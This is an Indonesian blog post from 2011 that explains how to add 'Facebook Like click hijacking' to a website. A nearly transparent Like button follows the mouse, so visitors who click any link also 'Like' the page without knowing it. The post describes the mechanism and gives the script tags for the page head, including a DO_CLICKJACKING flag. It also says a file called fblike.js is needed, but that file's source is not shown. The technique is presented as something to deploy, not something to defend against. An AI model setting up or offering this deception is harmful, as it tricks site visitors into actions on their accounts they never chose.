Jumat, 19 Agustus 2011

Facebook Like Click Hijacking

Facebook Like Click Hijacking dapat membuat sebuah situs web di mana pengguna akan melakukan klik Facebook like ketika mengklik link apapun pada halaman. Ini bekerja dengan memunculkan sebuah tombol Facebook Like (dengan opacity yang sangat rendah) ketika pengunjung web kita mengarahkan mouse-nya pada sebuah url/link.

img

BAGAIMANA CARA KERJANYA ?
Karena kita tidak dapat menginjeksi css atau javascript di dalam iframe facebook, maka solusinya adalah dengan membuat tombol seperti mengikuti mouse. Ketika mouse tidak dosorot ke sebuah url/link maka akan terlihat biasa saja, tapi ketika mouse disorot ke sebuah url/link maka akan nampak sebuah tombol Facebook Like yang akan memaksa pengunjung untuk meng-klik tombol itu sebelum agar dapat mengunjungi alamat url/link yang disorot.

Setelah pengunjung meng-klik tombol itu, sebuah javascript akan mengarahkan pengunjung ke alamat url/link itu, selanjutnya tombol itu tidak akan nampak lagi (tapi hanya akan berlaku pada halaman itu saja). Pada halaman selanjutnya/baru, tombol Facebook Like akan kembali muncul.

CARA MEMASANGNYA 
Kita hanya perlu memasang script dibawah ini diantara TAG
Code:
<HEAD> dan </HEAD>

Code:
<script src="http://code.jquery.com/jquery-1.5.js"></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.DO_CLICKJACKING = 1</script>
<script src="fblike.js"></script>

nb : "fblike.js" adalah nama file javascript-nya

Berikut source code file fblike.js :

Upload ke hostingan anda. Sesuaikan tempat file fblike.js ini dengan script yang ada di atas tadi yang berada diantara TAG HEAD

Selanjutnya anda tinggal melihat hasilnya pada website anda

Referensi dan demo : http://fernandomagro.com/programming/facebook-clickjacking-howto

1 komentar: